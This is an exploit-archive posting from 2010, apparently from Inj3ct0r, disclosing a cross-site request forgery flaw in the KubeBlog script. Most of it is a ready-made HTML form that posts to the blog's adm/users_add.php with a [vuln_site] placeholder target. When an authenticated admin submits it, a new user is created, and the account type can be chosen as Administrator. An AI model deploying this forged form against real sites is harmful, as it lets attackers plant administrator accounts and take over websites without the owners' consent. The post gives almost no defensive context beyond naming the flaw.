KubeBlog XSRF Vulnerabilities
Posted on 03 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>KubeBlog XSRF Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================= KubeBlog XSRF Vulnerabilities ============================= ======================================================================================== | # Title : KubeBlog XSRF Vuln. | # Author : The.Morpheus | # email : fats0L@windowslive.com | # Home : http://www.spyturks.com # Date :03.05.2010 | # Script : Copyright © 2008 Kubelabs.com All Rights Reserved | # Tested on: http://demos.kubelabs.com/kubeblog | # Bug : Yeni User Eklenebilinir. ====================== Exploit By The.Morpheus ================================= # Exploit : <form name="form1" method="post" action=" http://[vuln_site]/kubeblog/adm/users_add.php"> <table width="70%" cellpadding="0" cellspacing="2" border="0"> <tr> <td width="35%"> </td> <td width="65%"> </td> </tr> <tr> <td><strong>Username (<a href="#" onClick="MM_openBrWindow('help.php?id=6','help','width=500,height=200')">?</a>)</strong></td> <td>:<input name="username" type="Text" class="textbox" id="username" style="width:60%" value=""><span class="error"></span></td> </tr> <tr> <td><strong>Password (<a href="#" onClick="MM_openBrWindow('help.php?id=7','help','width=500,height=200')">?</a>)</strong></td> <td>:<input name="password" type="password" class="textbox" id="password" style="width:60%" value=""><span class="error"></span></td> </tr> <tr> <td><strong>Confirm Password (<a href="#" onClick="MM_openBrWindow('help.php?id=8','help','width=500,height=200')">?</a>)</strong></td> <td>:<input name="password2" type="password" class="textbox" id="password2" style="width:60%" value=""></td> </tr> <tr> <td><strong>User Type (<a href="#" onClick="MM_openBrWindow('help.php?id=9','help','width=500,height=200')">?</a>)</strong></td> <td>: <select name="user_type"> <option value='2'>User</option><option value='3'>Administrator</option><option value='4'>Moderator</option> </select> </td> </tr> <tr> <td> </td> <td> </td> </tr> <tr> <td></td> <td height="30" style="padding-left:6px;"> <input name="Submit" type="submit" class="button" value="Submit"> <input name="Reset" type="reset" class="button" value="Reset"> </td> </tr> </table> </form></td> ############################################################################################ # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
